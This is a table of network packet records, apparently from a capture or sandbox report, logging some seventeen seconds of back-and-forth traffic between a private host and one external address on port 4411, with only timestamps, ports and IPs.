Dec 29, 2024 09:50:04.950314999 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:05.069658995 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.122381926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:05.241657972 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.294275999 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:05.413614035 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.413667917 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:05.532910109 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.692558050 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.714917898 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:05.834352016 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.902574062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:05.913851023 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.033164024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.044909000 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.060631990 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.113078117 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.153404951 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.220648050 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.223421097 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.342916965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.356940031 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.477057934 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.477119923 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.596436024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.596518993 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.715862989 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.715941906 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.835289001 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.839317083 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:06.869260073 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:06.918947935 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.000582933 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.000734091 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.045872927 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.119959116 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.120151997 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.169233084 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.239451885 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.239764929 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.256109953 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.372081041 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.379455090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.379532099 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.540606976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.540764093 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.569545031 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.660075903 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:07.660212994 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:07.779562950 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.012970924 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:08.132405996 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.132488012 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:08.251878977 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.251926899 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:08.371341944 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.464730024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.473939896 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:08.593468904 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.675163031 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.803910971 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.804074049 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:08.887654066 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:08.913203955 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:09.032444954 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:09.043551922 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:09.162895918 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:09.163558006 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:09.282891989 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:09.622287035 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:09.741683006 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:09.966222048 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.074004889 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.085452080 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.085689068 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.204987049 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.205034018 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.324265957 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.324311018 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.417933941 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.417999983 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.443547010 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.443623066 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.537249088 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.538983107 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.562908888 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.658247948 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.658303976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.715280056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.715337992 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.777581930 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.777659893 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.834630966 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.868984938 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.944556952 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:10.944601059 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:10.967271090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.064239979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.071299076 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.107628107 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.190685034 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.190763950 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.219085932 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.278309107 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.356545925 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.357021093 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.401213884 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.476404905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.477488041 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.520797968 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.596820116 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.597884893 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.611604929 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.668929100 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.760531902 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:11.760591984 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:11.879897118 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.075531006 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.194813967 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.194858074 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.314091921 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.544306993 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.549465895 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.663727999 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.663779020 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.759741068 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.759812117 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.783119917 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.783217907 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.874434948 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.874502897 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.879102945 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.879168987 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:12.902545929 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.993896961 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:12.998591900 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.089705944 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.092410088 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:13.204806089 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.211709976 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.215337992 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:13.334676981 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.342989922 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.347191095 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:13.414813042 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.508620024 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.508742094 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:13.545362949 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.628056049 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:13.630052090 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:13.749332905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.153708935 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.273086071 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.273191929 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.392672062 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.392724991 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.512075901 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.544646025 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.605324030 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.664025068 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.664089918 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.783442974 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.815829992 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.817332029 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:14.874751091 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.980631113 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:14.980694056 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:15.026043892 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:15.100255013 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:15.106875896 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:15.147034883 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:15.226267099 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:15.228323936 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:15.347639084 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:15.638252974 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:15.757664919 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.075594902 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.090356112 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.168950081 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.194992065 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.195045948 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.314344883 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.314402103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.433883905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.466228962 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.527220964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.527326107 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.585588932 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.585638046 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.646519899 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.646572113 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.704993963 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.705046892 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.737454891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.737554073 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.796175957 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.796283007 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.856894016 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.856975079 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:16.947787046 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:16.947832108 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.032578945 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.032635927 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.067038059 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.067356110 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.173017979 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.192559004 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.195384979 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.195537090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.195657015 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.314681053 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.315663099 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.318960905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.372420073 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.405987978 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.406232119 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.476531982 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.476686001 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.525640011 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.529253006 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.575206041 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.636617899 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:17.639427900 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:17.758776903 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.122545958 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.241813898 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.241869926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.361226082 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.361274004 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.480571985 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.480621099 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.574130058 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.574183941 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.599843979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.599894047 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.693752050 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.693799973 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.719156981 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.719208002 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.784636974 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.814253092 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.814311028 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:18.838483095 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.904468060 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.933542013 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:18.933617115 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:19.024857998 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.052819967 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.053030968 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:19.144388914 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.172533035 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.172728062 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:19.263348103 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.292210102 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.292356968 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:19.383101940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.412059069 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:19.412322044 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:19.531922102 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.357356071 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:20.476774931 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.476834059 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:20.596086025 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.596149921 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:20.715612888 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.717247963 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:20.809031963 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.836565971 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.837412119 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:20.956690073 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:20.956737995 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.047339916 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.047405958 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.075944901 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.076004982 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.166724920 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.166800976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
